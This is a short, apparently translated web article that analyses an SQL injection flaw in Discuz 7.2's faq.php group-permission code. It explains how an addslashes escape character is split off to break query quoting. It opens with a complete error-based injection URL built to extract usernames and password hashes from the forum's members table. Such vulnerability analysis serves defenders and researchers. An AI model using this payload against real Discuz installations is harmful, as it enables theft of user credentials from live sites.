faq. php SQL injection vulnerability analysis for Discuz version 7.2
- 2021-07-10 19:09:52
- OfStack
Inject code examples:
https://www.ofstack.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
Vulnerability analysis: by phithon
($action == 'grouppermission') {
...
ksort($gids);
$groupids = array();
foreach($gids as $row) {
$groupids[] = $row[0];
}
$query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
...
}
function implodeids($array) {
if(!empty($array)) {
return "'".implode("','", is_array($array) ? $array : array($array))."'";
} else {
return '';
}
}
First define an array, groupids, and then walk through $gids (which is also an array, that is, $_ GET [gids]), taking out the first bit of all the values in the array and putting it in groupids.
Why does this operation cause injection?
discuz escapes the GET array globally by addslashes, meaning 'To\', so if we pass in the parameter: gids [1] = ', it will be escaped to $gids [1] =\', and this assignment statement $groupids [] = $row [0] is equivalent to taking the first character of the string, which is\, and taking out the escape symbol.
Looking back, he used implodeids to process the data once before putting it into the sql statement. We see the implodeids function
A simple function is to split the $groupids array just now with ',' and form a string similar to '1', '2', '3' and '4' to return.
But our array just took out an escape character, and it will escape a normal 'here, such as this:
'1','\','3','4'
Do you see a little difference? The fourth single quotation mark has been escaped, which means that the fifth single quotation mark and the third single quotation mark are closed?